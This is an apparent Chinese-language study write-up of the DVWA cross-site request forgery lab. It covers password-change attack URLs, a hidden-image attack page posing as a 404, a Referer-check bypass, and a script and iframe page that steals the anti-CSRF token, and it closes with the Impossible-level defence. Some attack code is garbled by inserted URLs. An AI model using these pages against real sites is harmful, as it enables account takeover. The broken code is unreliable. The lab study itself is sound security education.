CSRF（跨站請求偽造）-有解無憂

CSRF，全稱Cross-site request forgery，翻譯過來就是跨站請求偽造，是指利用受害者尚未失效的身份認證資訊（cookie、會話等），誘騙其點擊惡意鏈接或者訪問包含攻擊代碼的頁面，在受害人不知情的情況下以受害者的身份向（身份認證資訊所對應的）服務器發送請求，從而完成非法操作（如轉賬、改密等）， CSRF與XSS最大的區別就在于，CSRF并沒有盜取cookie而是直接利用， Low

可以看到，服務器收到修改密碼的請求后，會檢查引數password_new與password_conf是否相同，如果相同，就會修改密碼，并沒有任何的防CSRF機制（當然服務器對請求的發送者是做了身份驗證的，是檢查的cookie，只是這里的代碼沒有體現= =），抓包得到，URL：方法一：http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change# 當用戶A在訪問該網站時，只要用戶A點擊黑客B精心構造的這個URL時就能造成CSRF攻擊不能跨瀏覽器,例如之前用的火狐，現在不能用Chrome瀏覽器，因為chrome不會利用火狐的cookie，當然，這個URL過于明顯，稍微有一點知識的人都能看出來這是一個改密碼的鏈接，所以說我們就應該想一下隱藏的放法，方法二：短鏈接來隱藏URL（點擊短鏈接，會自動跳轉到真實網站）需要提醒的是，雖然利用了短鏈接隱藏url，但受害者最侄訓是會看到密碼修改成功的頁面，所以這種攻擊方法也并不高明，方法三：構造攻擊頁面(html檔案) 現實攻擊場景下，這種方法需要事先在公網上傳一個攻擊頁面，誘騙受害者去訪問，真正能夠在受害者不知情的情況下完成CSRF攻擊，檔案如下： <img src="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0"style="display:none;"/> <h1>404<h1> <h2>file not found.<h2> 其中style="display:none;"是不讓這個元素顯示出來當受害者訪問test.html時，會誤認為是自己點擊的是一個失效的url，但實際上已經遭受了CSRF攻擊，密碼已經被修改為了hack， Medium

int eregi(string pattern, string string) 檢查string中是否含有pattern（不區分大小寫），如果有回傳True，反之False，可以看到，Medium級別的代碼檢查了保留變數 HTTP_REFERER（http包頭的Referer引數的值，表示來源地址）中是否包含SERVER_NAME（http包頭的Host引數，及要訪問的主機名，這里是192.168.0.104），希望通過這種機制抵御CSRF攻擊，漏洞利用過濾規則是http包頭的Referer引數的值中必須包含主機名（這里是192.168.0.104）我們可以將攻擊頁面命名為192.168.0.104.html（頁面被放置在攻擊者的服務器里，這里是10.4.253.2）就可以繞過了

Referer引數完美繞過過濾規則

High High級別的代碼加入了Anti-CSRF token機制，用戶每次訪問改密頁面時，服務器會回傳一個隨機的token，向服務器發起請求時，需要提交token引數，而服務器在收到請求時，會優先檢查token，只有token正確，才會處理客戶端的請求，漏洞利用要繞過High級別的反CSRF機制，關鍵是要獲取token，要利用受害者的cookie去修改密碼的頁面獲取關鍵的token，試著去構造一個攻擊頁面，將其放置在攻擊者的服務器，引誘受害者訪問，從而完成CSRF攻擊，下面是代碼， <script type="text/javascript"> function attack() { document.getElementsByName('user_token')[0].value=https://www.cnblogs.com/zjwoo/p/document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value; document.getElementById("transfer").submit(); } </script> <iframe src="http://192.168.153.130/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;"> </iframe> <body onl oad="attack()"> <form method="GET" id="transfer" action="http://192.168.153.130/dvwa/vulnerabilities/csrf"> <input type="hidden" name="password_new" value="https://www.cnblogs.com/zjwoo/p/password"> <input type="hidden" name="password_conf" value="https://www.cnblogs.com/zjwoo/p/password"> <input type="hidden" name="user_token" value=""> <input type="hidden" name="Change" value="https://www.cnblogs.com/zjwoo/p/Change"> </form> </body> Impossible 可以看到，Impossible級別的代碼利用PDO技術防御SQL注入，至于防護CSRF，則要求用戶輸入原始密碼（簡單粗暴），攻擊者在不知道原始密碼的情況下，無論如何都無法進行CSRF攻擊，

本文僅是個人學習記錄，部分摘自FreeBuf.Com等，

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/21015.html

標籤：其他

上一篇：Command Injection命令注入

下一篇：File Inclusion（檔案包含）